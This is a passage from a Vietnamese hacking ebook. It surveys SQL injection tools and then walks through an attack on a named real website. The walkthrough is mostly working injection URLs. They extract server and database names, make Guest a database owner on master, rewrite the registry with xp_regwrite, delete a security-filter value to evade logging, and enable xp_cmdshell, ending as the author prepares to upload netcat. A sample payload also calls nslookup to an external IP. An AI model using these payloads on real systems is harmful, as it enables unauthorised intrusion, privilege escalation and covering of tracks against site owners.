Tải bản đầy đủ (.pdf) (6 trang)

Hacker Professional Ebook part 241 ppsx

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (219.55 KB, 6 trang )

vào danh sách từ điển cho riêng mình.Wpoison chạy trên Linux,có thể download
tại:

Ngoài ra còn có công cụ SPIKE Proxy,nó có các chức năng khá tốt-tự động thực
hiện SQL Injection -những d0oạn string sẽ được Inject tuỳ vào thói quen người sử
dụng .SPIKE Proxy là 1 Python và OpenSSL-công cụ đánh giá ứng dụng web cơ
bản có các chức năng như HTTP và HTTPS Proxy Nó cho phép người phát triển
web hoặc người quản trị ứng dụng web cấp thấp truy cập vào tòan bộ phương tiện
ứng dụng web,trong khi nó cũng cung cấp 1 nhóm các công cụ tự động và những
kĩ năng khám phá ra những lỗi thông thường,các công cụ đó bao gồm:SQL
Injection,Website Crawler,Login Form Brute Forcer,Automated Overflow
Detection v.vSpike Proxy chạy trên Win32 và Linux,các bạn có thể Download tại:
www.immunitysec.com/spike.html
Chú ý là phần mềm này nặng khoảng 13M và máy tính của bạn phải có sẵn Python
và OpenSSL.Trong WinXP công cụ này không hoạt động.

Mieliekoek.pl là 1 SQL Insertion Crawler,có chức năng kiểm tra các form liên
quan đến lỗi SQL.Scrip này cung cấp 1 công cụ Web mirroring như là dữ liệu
vào,xem xét từng file và nhân diện sự tồn tại các form trong file.Các chuỗi được
Inject có thể dễ dàng thay đổi trong file cấu hình.Download Mieliekoek tại:
/mieliekoek.pl
Công cụ này chỉ hoạt động khi máy bạn đã cài PERL.Sau đây là 1 ví dụ của dữ liệu
xuất từ mieliekoek:

$badstring="blah''';
#$badstring="blah' or 1=1 ";
$badstring="blah' exec master xp_cmdshell 'nslookup a.com 196.30.67.5' - ';


Trên đây hình như là tất cả các bài viết về SQL Injection bằng tiếng Việt mà
fantomas311 có , trong đó gồm các tác giả : Windak - Hoahongtim (Viethacker),


Vicki , Chubehamhoc - Binhtrieu (VNISS) Ngoài ra còn vài người khác nữa ko
nhớ là ai Trên đây cũng có một vài chỉnh sửa và bổ sung của Fantomas311 , tuy
vậy chắc cũng còn sai sót đâu đó , anh em nào đọc thấy sai chỗ nào góp ý dùm !

Hi vọng đây có thể là một tài liệu hữu ích cho các bạn muốn tìm hiểu về SQL
Injection
Thân !
fantomas311(VNISS)


Hack SQL Injection và nâng quyền với "sa" (bài 1)

Bài viết được hoàn thành với sự trợ giúp của : Mr NEO
TÌM KIẾM
Uhm dạo này đói kém cc ,sau một hồi tìm kiếm shop mong kiếm được chút cháo
trên google thì tình cờ tìm được site

hxxp://www.darksidecreations.com/category.asp?catcode=10

Chà site sex bà coan ơi sex thì sex thêm đại dấu ' vô

hxxp://www.darksidecreations.com/category.asp?catcode=10'



KIỂM TRA
dính rồi vui quá nhào dzô check tiếp nào

hxxp://www.darksidecreations.com/category.asp?catcode=10 and
1=convert(int,@@servername) sp_password




Vậy là được Server name là : BACKUP

tiện thể làm luôn cái tên DB
hxxp://www.darksidecreations.com/category.asp?catcode=10 and
1=convert(int,db_name()) sp_password



Được Database Name là : darkside

chậc đúng là dark ( site sex mà )

Kiểm tra cái thằng system user xem nào

hxxp://www.darksidecreations.com/category.asp?catcode=10 and
1=convert(int,system_user) sp_password



wow hay quá nè System_User 'sa'
lúc này nghĩ ngay tới việc hack server đã thiệt

Kiểm tra coi thằng ku SAdmin nó có Enable cái OpenRowSet cho mình không ha

hxxp://www.darksidecreations.com/category.asp?catcode=10;select%20*%20from
%20openro wset('sqloledb','';;,'') sp_password


Microsoft OLE DB Provider for SQL Server error '80040e14'
Ad hoc access to OLE DB provider 'sqloledb' has been denied. You must access
this provider through a linked server.
/category.asp, line 8

TrickyMaster(VNISS)
Hack SQL Injection và nâng quyền với "sa" (bài 2)


NÂNG & CHIẾM QUYỀN
Giờ làm gì nhỉ ??
ah đưa mình (Guest) dzô DB OWNER của DB Master .

Tại sao lại phải đưa Guest vào DataBase Owner cuar DataBase Master?
Bở vì la` DB Owner của Db Master mới có quyền thực hiện lệnh
xp_regwrite,xp_regdeletevalue và xp_cmdshell.
Tại sao Guest lại sử dụng 2 lệnh xp_regwrite,xp_regdeletevalue và
xp_cmdshell
Bởi vì :
xp_regwrite dùng để thực hiện lệnh ghi lên Registry của Windows
xp_regdeletevalue dùng để xóa dữ liệu trong Registry của Windows
xp_cmdshell dùng để gửi lệnh lên Windows dùng đề nâng quyền , chiếm quyền ,
cài backdoor

Còn đây là lệnh để đưa Guest vào Db Owner của Db Master

hxxp://www.darksidecreations.com/category.asp?catcode=10;exec sp_executesql
N'create view dbo.test as select * from master.dbo.sysusers'exec sp_msdropretry
'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx
update dbo.test set sid=0x01,roles=0x01 where name=''Guest''','xx' exec

sp_executesql N'drop view dbo.test' sp_password

Nếu chạy links trên mà không báo lỗi và được trả về trang :
hxxp://www.darksidecreations.com/category.asp?catcode=10
tức là bạn đã thực hiện thành công việc đưa Guest vào Db Owner của Db Master
nhưng để cho chắc ăn mình vẫn kiểm tra lại một lần nữa bằng cách sau :

hxxp://www.darksidecreations.com/category.asp?catcode=10%20%20and%201=c
onvert(int,( select%20top%201%20name%20from%20master sysusers%
20where%20roles=0x01%20and%20name%20not%20in('dbo' ))) sp_password



Vậy là xong giờ thì thoải mái chạy xp_regwrite với cả xp_cmdshell
Có thể chạy xp_regwrite ,xp_regdeletevalue với xp_cmdshell rồi thì làm gì ???
Giờ login vào Database với user BUILTIN\ADMINISTRATOR với password = ""
chạy thế này ;

hxxp://www.darksidecreations.com/category.asp?catcode=10;exec%20sp_executes
ql%20N'c reate%20view%20dbo.test%20as%20select%20*%20from%2
0master.dbo.sysxlogins'%20exec%20sp_msdropretry%20
'xx%20update%20sysusers%20set%20sid=0x01%20where%2
0name=''dbo''','xx'%20exec%20sp_msdropretry%20'xx%
20update%20dbo.test%20set%20xstatus=18%20where%20n
ame=''BUILTIN\ADMINISTRATORS''','xx'%20exec%20sp_e
xecutesql%20N'drop%20view%20dbo.test' sp_password

Vậy là ta có một chú nằm vùng trong Db của nó he he sau này mọi mệnh lệnh đề
phải thông qua chú này


Nhưng giờ xài xp_regwrite trước ha
Giờ mình dùng xp_regwrite để Enable cái OpenRowset đã bị thằng ku SysAdmin
kia Disable ( tuy giờ đã Enable nhưng mình vẫn viết ra để các bạn biết )

hxxp://www.darksidecreations.com/category.asp?catcode=10;exec
master xp_regwrite
HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer
\Providers\SQLOLEDB','AllowInProcess',REG_DWORD,1 sp_password

hxxp://www.darksidecreations.com/category.asp?catcode=10;exec
master xp_regwrite
HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer
\Providers\SQLOLEDB','DisallowAdhocAccess',REG_DWORD,0 sp_password

Để ý mấy chỗ in đậm nhé:
1 : Enable
0 : Disable

he he chạy mà nó trả về trang chủ là thành công khỏi check
Giờ thì xài cái thằng xp_regdeletevalue để hủy chức năng ghi log và lọc dữ liệu
của WINDOWS

hxxp://www.darksidecreations.com/category.asp?catcode=10;exec
master xp_regdeletevalue
'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Ser
vices\Tcpip\Parameters','EnableSecurityFilters' sp_password

Giờ thì các bạn khỏi lo bị ghi log chính vì thế mình bỏ cái sp_password đi cũng
được ^_^ nhưng bạn để lại cũng chẳng sao
Giờ đến lúc bật cái xp_cmdshell lên à các bạn lưu ý nha ở trên là cho phép chạy

xp_cmdshell còn ở đây là bật xp_cmdshell và allow updates kẻo lại chửi oan mình
thì chết

hxxp://www.darksidecreations.com/category.asp?catcode=10;select * from
openrowset('sqloledb', 'server=BACKUP;uid=BUILTIN\Administrators;pwd=', 'set
fmtonly off select 1 exec master sp_addextendedproc xp_cmd,''xpsql70.dll'' exec
sp_configure ''allow updates'', ''1'' reconfigure with override') sp_password

TrickyMaster(VNISS)

Hack SQL Injection và nâng quyền với "sa" (bài 3)


Vậy là xong giờ thì dùng tới thằng xp_cmdshell để upload netcat
Giờ các bạn chuẩn bị cho mình thế này:

×